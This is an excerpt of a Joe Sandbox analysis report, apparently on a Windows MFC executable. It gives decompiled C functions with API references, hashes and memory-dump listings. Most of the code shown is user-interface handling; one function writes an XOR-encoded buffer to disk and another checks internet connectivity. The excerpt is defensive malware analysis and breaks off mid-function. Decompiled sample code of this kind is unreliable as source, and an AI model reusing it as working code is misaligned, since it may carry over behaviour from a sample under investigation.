Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #858$#535#800H_prologstrncmp
String ID:
API String ID: 3866690751-0
Opcode ID: 3391acb5f2ab276b8bfae1e3fa978c50045169f2dc8064dd3033d131624916e5
Instruction ID: 0c4d8cd7b005c67d5753f14f3771aad290dd6004bd016341436a613b45cee016
Opcode Fuzzy Hash: 3391acb5f2ab276b8bfae1e3fa978c50045169f2dc8064dd3033d131624916e5
Instruction Fuzzy Hash: E1118675200205AFCB14DF09D8C5D6EB3A9EF59318F10812AF9069B391D738ED89CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00424439, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00424439(void* __ecx, long long __fp0) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __ebp;
				void* _t10;
				signed int _t15;
				void* _t20;
				void* _t22;
				long long* _t24;
				intOrPtr _t25;

				_t25 =  *0x455900; // 0x0
				_t22 = __ecx;
				if(_t25 != 0) {
					return _t10;
				}
				 *0x455900 = 1;
				__imp__time( &_v8);
				__imp__difftime(_v8,  *((intOrPtr*)(__ecx + 0x17d0)));
				 *_t24 = __fp0;
				L0043E7A2();
				_v12 = 0;
				_pop(_t20);
				_t15 = ( *(__ecx + 0x17bc) * 0x3c +  *((intOrPtr*)(__ecx + 0x17c0))) * 0x3c;
				_v16 = _t15;
				asm("fild qword [ebp-0xc]");
				asm("fcompp");
				asm("fnstsw ax");
				asm("sahf");
				st0 = st1;
				if(_t15 < 0) {
					L7:
					 *0x455900 = 0;
					return _t15;
				}
				_t15 = E0042900A(_t20);
				if(_t15 == 0) {
					goto L7;
				}
				if( *((intOrPtr*)(__ecx + 0x17f9)) != 0) {
					_t21 =  *((intOrPtr*)(__ecx + 0x60));
					if( *((intOrPtr*)(__ecx + 0x60)) != 0) {
						_t15 = E0040F1E4(_t21);
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t22 + 0x16b8);
				_push(0x423889);
				L0043E2BE();
				return _t15;
			}

0x00424442
0x00424449
0x0042444b
0x004244e2
0x004244e2
0x00424454
0x0042445f
0x0042446e
0x00424475
0x00424478
0x00424483
0x00424490
0x00424491
0x00424494
0x00424497
0x0042449c
0x0042449e
0x004244a0
0x004244a1
0x004244a3
0x004244d9
0x004244d9
0x00000000
0x004244d9
0x004244a5
0x004244ac
0x00000000
0x00000000
0x004244b4
0x004244b6
0x004244bb
0x004244bd
0x004244bd
0x004244bb
0x004244c2
0x004244c3
0x004244c4
0x004244cb
0x004244cc
0x004244cd
0x004244d2
0x00000000

APIs

time.MSVCRT ref: 0042445F
difftime.MSVCRT ref: 0042446E
fabs.MSVCRT ref: 00424478

Part of subcall function 0042900A: InternetGetConnectedState.WININET(?,00000000), ref: 0042901B

#1105.MFC42(00423889,?,00000000,00000000,00000000,00000000), ref: 004244D2

Part of subcall function 0040F1E4: __EH_prolog.LIBCMT ref: 0040F1E9
Part of subcall function 0040F1E4: #535.MFC42(?), ref: 0040F210

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1105#535ConnectedH_prologInternetStatedifftimefabstime
String ID:
API String ID: 1470086928-0
Opcode ID: 7534668357fa519d6f017ae56d4ee01d02b2666687b9c6b7c062181a1d77e856
Instruction ID: 5b28e0d68b789501ed7beaebd846feacb06c36d797679912e657b911eb5db408
Opcode Fuzzy Hash: 7534668357fa519d6f017ae56d4ee01d02b2666687b9c6b7c062181a1d77e856
Instruction Fuzzy Hash: BA11E5B5A04218EFCB14BFA1EC955DABBBCFB40344F94457FF44692290E738AD108B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC5C, Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040BC5C(void* __ecx, void* __eflags, CHAR* _a4) {
				long _v8;
				void _v4216;
				signed char* _t15;
				int _t18;
				void* _t24;
				void* _t25;
				void* _t29;

				_t25 = __ecx;
				E0043E690(0x1074, __ecx);
				_t24 = _t25;
				_t29 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t29 != 0xffffffff) {
					E0040BCF2( &_v4216, _t24);
					_t15 =  &_v4216;
					do {
						 *_t15 =  *_t15 ^ 0x000000aa;
						_t15 =  &(_t15[1]);
					} while (_t15 <  &_v8);
					_t18 = WriteFile(_t29,  &_v4216, 0x1070,  &_v8, 0);
					_push(_t29);
					if(_t18 != 0) {
						CloseHandle();
						return E0042AAFA(_a4) & 0xffffff00 | _v8 == 0x00001070;
					}
					CloseHandle();
				}
				return 0;
			}

0x0040bc5c
0x0040bc64
0x0040bc80
0x0040bc88
0x0040bc8d
0x0040bc9a
0x0040bc9f
0x0040bca5
0x0040bca5
0x0040bca8
0x0040bcac
0x0040bcc3
0x0040bccb
0x0040bccc
0x0040bcd6
0x00000000
0x0040bce8
0x0040bcce
0x0040bcce
0x00000000

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040BC82
WriteFile.KERNEL32(00000000,?,00001070,?,00000000), ref: 0040BCC3
CloseHandle.KERNEL32(00000000), ref: 0040BCCE
CloseHandle.KERNEL32(00000000), ref: 0040BCD6

Part of subcall function 0042AAFA: CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000000,00000000,00000000,00001070), ref: 0042AB13

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: File$CloseCreateHandle$Write
String ID:
API String ID: 189266078-0
Opcode ID: ecd3915b1d4e570c02aee5fbb9164a0a9066683c5b5f75ce537a799820463d62
Instruction ID: f7f96c66c86763bb7cb78a4b32446261e3b992c9dc9e8af88aba213ad30c1075
Opcode Fuzzy Hash: ecd3915b1d4e570c02aee5fbb9164a0a9066683c5b5f75ce537a799820463d62
Instruction Fuzzy Hash: 2A010432505124BBEB209BA1DD49FDB3B6CEF56360F1001BAF64AE20C0CB745D81C6AC

Uniqueness

Uniqueness Score: -1.00%

Function 00422EF4, Relevance: 6.1, APIs: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00422EF4(void* __ecx) {
				struct HWND__* _t20;
				intOrPtr _t21;
				intOrPtr* _t24;
				void* _t44;
				void* _t47;

				E0043E4E0(0x4425a0, _t47);
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				L0043DDD8();
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				if(__ecx != 0) {
					_t20 =  *((intOrPtr*)(__ecx + 0x20));
				} else {
					_t20 = 0;
				}
				_t21 = E00428E0F(_t20, _t47 - 0x10);
				if(_t21 != 0) {
					_t21 =  *((intOrPtr*)(_t47 - 0x10));
					if( *((intOrPtr*)(_t21 - 8)) != 0) {
						_t46 = _t44 + 0x78;
						E004207FC();
						_t24 = E00429029(_t47 - 0x14, 0xe04b);
						 *(_t47 - 4) = 1;
						E004207D4(_t44 + 0x78,  *_t24);
						 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
						L0043DD36();
						E004207FC();
						E004207D4(_t44 + 0x78,  *((intOrPtr*)(_t47 - 0x10)));
						_t21 = E004201B7(_t46);
					}
				}
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t21;
			}

0x00422ef9
0x00422efe
0x00422eff
0x00422f01
0x00422f06
0x00422f0b
0x00422f11
0x00422f17
0x00422f13
0x00422f13
0x00422f13
0x00422f1f
0x00422f28
0x00422f2a
0x00422f31
0x00422f33
0x00422f38
0x00422f46
0x00422f51
0x00422f55
0x00422f5a
0x00422f61
0x00422f68
0x00422f72
0x00422f79
0x00422f79
0x00422f31
0x00422f7e
0x00422f85
0x00422f8e
0x00422f96

APIs

__EH_prolog.LIBCMT ref: 00422EF9
#540.MFC42 ref: 00422F06
#800.MFC42(00000000), ref: 00422F61
#800.MFC42 ref: 00422F85

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#540H_prolog
String ID:
API String ID: 4013826629-0
Opcode ID: 595f0816ca4d4161ec2dce1c21f105c605fb2e2a804aa443e2638f42fe1344f7
Instruction ID: 3e5f22d906b6b921729493b42256d54c7cea30ed46b7747ced6a07e723b447f9
Opcode Fuzzy Hash: 595f0816ca4d4161ec2dce1c21f105c605fb2e2a804aa443e2638f42fe1344f7
Instruction Fuzzy Hash: 34119171A11135ABCB19E790EA167AE73B4AF44318F90045FE012771D2EFBC2E05C759

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF84, Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040CF84(void* __ecx) {
				struct tagLOGFONTA _v64;
				void* __ebp;
				void* _t8;
				void* _t10;
				struct HFONT__* _t15;
				void* _t17;
				void* _t18;
				struct HFONT__* _t19;
				void* _t25;
				void* _t27;

				_t25 = __ecx;
				if(E0040CC69(_t8, __ecx) != 0) {
					_t10 = E0040CD41(_t25);
					_t18 = _t10;
					if(_t18 == 0) {
						return _t10;
					}
					_t27 = _t25 + 0x44;
					if(_t27 != 0 &&  *((intOrPtr*)(_t27 + 4)) != 0) {
						L0043DD72();
					}
					_t19 = GetObjectA( *(_t18 + 4), 0x3c,  &_v64);
					if(_t19 != 0) {
						_v64.lfUnderline = 1;
						_t15 = CreateFontIndirectA( &_v64);
						_push(_t15);
						L0043DD60();
						_t19 = _t15;
						if(_t19 != 0 &&  *((intOrPtr*)(_t25 + 0xb0)) != 0) {
							E0040C88B(_t25);
						}
					}
					return _t19;
				}
				_t17 = 1;
				return _t17;
			}

0x0040cf8c
0x0040cf96
0x0040cf9f
0x0040cfa4
0x0040cfa8
0x0040d006
0x0040d006
0x0040cfab
0x0040cfb0
0x0040cfba
0x0040cfba
0x0040cfce
0x0040cfd2
0x0040cfd7
0x0040cfdc
0x0040cfe2
0x0040cfe5
0x0040cfea
0x0040cfee
0x0040cffb
0x0040cffb
0x0040cfee
0x00000000
0x0040d002
0x0040cf9a
0x00000000

APIs

Part of subcall function 0040CC69: #3797.MFC42(0040C750), ref: 0040CC6D

#2414.MFC42 ref: 0040CFBA
GetObjectA.GDI32(?,0000003C,?), ref: 0040CFC8
CreateFontIndirectA.GDI32(?), ref: 0040CFDC
#1641.MFC42(00000000), ref: 0040CFE5

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1641#2414#3797CreateFontIndirectObject
String ID:
API String ID: 8113875-0
Opcode ID: b4fd1338bcccc560eb2f600723680d29eb09a89135e86c7daad66885977364cb
Instruction ID: 28be234ebe1a46c710db5f93e42e0e435bd41b05672fc9b850399b65590ee0b9
Opcode Fuzzy Hash: b4fd1338bcccc560eb2f600723680d29eb09a89135e86c7daad66885977364cb
Instruction Fuzzy Hash: 33017931B00601A7DB256BE59CC577F765D9B4470CF04013BEA05F62D1DFB8DC0A8299

Uniqueness

Uniqueness Score: -1.00%

Function 0040C740, Relevance: 6.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040C740(void* __ecx) {
				struct tagLOGFONTA _v64;
				void* __ebp;
				void* _t7;
				void* _t9;
				struct HFONT__* _t14;
				void* _t16;
				void* _t17;
				struct HFONT__* _t18;
				void* _t24;
				void* _t26;

				_t24 = __ecx;
				if(E0040CC69(_t7, __ecx) != 0) {
					_t9 = E0040CD41(_t24);
					_t17 = _t9;
					if(_t17 == 0) {
						return _t9;
					}
					_t26 = _t24 + 0x44;
					if(_t26 != 0 &&  *((intOrPtr*)(_t26 + 4)) != 0) {
						L0043DD72();
					}
					_t18 = GetObjectA( *(_t17 + 4), 0x3c,  &_v64);
					if(_t18 != 0) {
						_t14 = CreateFontIndirectA( &_v64);
						_push(_t14);
						L0043DD60();
						_t18 = _t14;
						if(_t18 != 0 &&  *((intOrPtr*)(_t24 + 0xb0)) != 0) {
							E0040C88B(_t24);
						}
					}
					return _t18;
				}
				_t16 = 1;
				return _t16;
			}

0x0040c748
0x0040c752
0x0040c75b
0x0040c760
0x0040c764
0x0040c7be
0x0040c7be
0x0040c767
0x0040c76c
0x0040c776
0x0040c776
0x0040c78a
0x0040c78e
0x0040c794
0x0040c79a
0x0040c79d
0x0040c7a2
0x0040c7a6
0x0040c7b3
0x0040c7b3
0x0040c7a6
0x00000000
0x0040c7ba
0x0040c756
0x00000000

APIs

Part of subcall function 0040CC69: #3797.MFC42(0040C750), ref: 0040CC6D

#2414.MFC42 ref: 0040C776
GetObjectA.GDI32(?,0000003C,?), ref: 0040C784
CreateFontIndirectA.GDI32(?), ref: 0040C794
#1641.MFC42(00000000), ref: 0040C79D

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1641#2414#3797CreateFontIndirectObject
String ID:
API String ID: 8113875-0
Opcode ID: 8acf4ecde69a6721dd3b70687a1dc9792587f2089f7f4f4589a81b75e2aa1c69
Instruction ID: ad5e05feb9c6b0ab7571cb48be3c3a985cbe88ebf25b46282599a39eac488d32
Opcode Fuzzy Hash: 8acf4ecde69a6721dd3b70687a1dc9792587f2089f7f4f4589a81b75e2aa1c69
Instruction Fuzzy Hash: 73017172700606E7DB256BA598C5B7F729C9B84704F04023BAA02B72D1DBB8DC068A99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7BF, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040C7BF(signed int __eax, intOrPtr* __ecx, intOrPtr* _a4) {
				void* _t16;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;

				_t13 = __eax;
				_t35 = __ecx;
				L0043E18C();
				if((0x00000100 & __eax) == 0) {
					_t13 = SetWindowLongA( *(__ecx + 0x20), 0xfffffff0, __eax | 0x00000100);
				}
				_t32 = 0;
				if(E0040CC69(_t13, _t35) != 0) {
					_t33 = _t35 + 0xcc;
					if( *((intOrPtr*)(_t35 + 0xcc)) == 0 &&  *((intOrPtr*)( *_t35 + 0xc0))() != 0) {
						 *_t33 = 1;
					}
					_t34 = _a4;
					_t16 = _t35 + 0x44;
					if(_t16 != 0 &&  *((intOrPtr*)(_t16 + 4)) != 0) {
						 *((intOrPtr*)( *_t34 + 0x30))(_t16);
					}
					 *((intOrPtr*)( *_t34 + 0x38))( *((intOrPtr*)(_t35 + 0x40)));
					_push(1);
					L0043E024();
					_t32 = GetStockObject(5);
				}
				return _t32;
			}

0x0040c7bf
0x0040c7c1
0x0040c7c3
0x0040c7cf
0x0040c7d9
0x0040c7d9
0x0040c7e2
0x0040c7eb
0x0040c7f4
0x0040c7fa
0x0040c80a
0x0040c80a
0x0040c810
0x0040c814
0x0040c819
0x0040c826
0x0040c826
0x0040c830
0x0040c833
0x0040c837
0x0040c844
0x0040c844
0x0040c84a

APIs

#3797.MFC42 ref: 0040C7C3
SetWindowLongA.USER32 ref: 0040C7D9
#5875.MFC42(00000001), ref: 0040C837
GetStockObject.GDI32(00000005), ref: 0040C83E

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3797#5875LongObjectStockWindow
String ID:
API String ID: 506942768-0
Opcode ID: 034c6b106ecd645e6621a235747fc9ef30b1817533f2a33c9e4ee541e2cda848
Instruction ID: e823b5a11dad4170919ef972148863e77ea494cfdecdc0d0cdf712d4536ba130
Opcode Fuzzy Hash: 034c6b106ecd645e6621a235747fc9ef30b1817533f2a33c9e4ee541e2cda848
Instruction Fuzzy Hash: BE115E31301201DBEB246B25CC88B6B77EAAF88315F05462EE546D72D0DB79E841CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5D7, Relevance: 6.0, APIs: 4, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040D5D7(intOrPtr* __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _t6;
				void* _t7;
				intOrPtr _t10;
				intOrPtr* _t19;

				_t6 = __eax;
				_t10 = _a4;
				if( *((intOrPtr*)(_t10 + 4)) != 0x100 ||  *((intOrPtr*)(_t10 + 8)) != 0x1b) {
					_push(_t10);
					L0043DE56();
					if(_t6 != 0) {
						goto L10;
					}
					L0043E1FE();
					if(_t6 == 0 ||  *((intOrPtr*)(_t6 + 0x54)) == 0) {
						while(1) {
							L0043E1F8();
							_t19 = _t6;
							if(_t19 == 0) {
								break;
							}
							_t6 =  *((intOrPtr*)( *_t19 + 0x98))(_t10);
							if(_t6 != 0) {
								goto L10;
							}
						}
						_push(_t10);
						L0043E1F2();
						return _t6;
					} else {
						return 0;
					}
				} else {
					L10:
					_t7 = 1;
					return _t7;
				}
			}

0x0040d5d7
0x0040d5d8
0x0040d5e7
0x0040d5ef
0x0040d5f2
0x0040d5f9
0x00000000
0x00000000
0x0040d5fd
0x0040d604
0x0040d612
0x0040d612
0x0040d617
0x0040d61b
0x00000000
0x00000000
0x0040d622
0x0040d62a
0x00000000
0x00000000
0x0040d62c
0x0040d635
0x0040d638
0x00000000
0x0040d60c
0x00000000
0x0040d60c
0x0040d630
0x0040d630
0x0040d632
0x00000000
0x0040d632

APIs

#5290.MFC42(?), ref: 0040D5F2
#3813.MFC42(?), ref: 0040D5FD
#3495.MFC42(?), ref: 0040D612
#5278.MFC42(?,?), ref: 0040D638

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3495#3813#5278#5290
String ID:
API String ID: 1724265275-0
Opcode ID: 1e920aadd781b051facda1a5ac2f92b77a8568ee8b65df60ba5b6014547d077d
Instruction ID: 1b490e03bd7bb4afa49857bb798c0971c119661fad0b1d4fa73481467684ef24
Opcode Fuzzy Hash: 1e920aadd781b051facda1a5ac2f92b77a8568ee8b65df60ba5b6014547d077d
Instruction Fuzzy Hash: 43F0A431B0111197CF251D9A8894B7F928A5B9C784F48483BE40EEB3C1DE7DCC8B96AD

Uniqueness

Uniqueness Score: -1.00%

Function 004186D9, Relevance: 6.0, APIs: 4, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004186D9(void* __ecx, void* __edx, void* __edi) {
				intOrPtr* _t14;
				intOrPtr _t18;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;
				void* _t29;

				_t25 = __edi;
				_t24 = __edx;
				_t13 = E0043E4E0(0x440ebe, _t29);
				_push(__ecx);
				_push(0x4098);
				L0043DD54();
				_t18 = _t13;
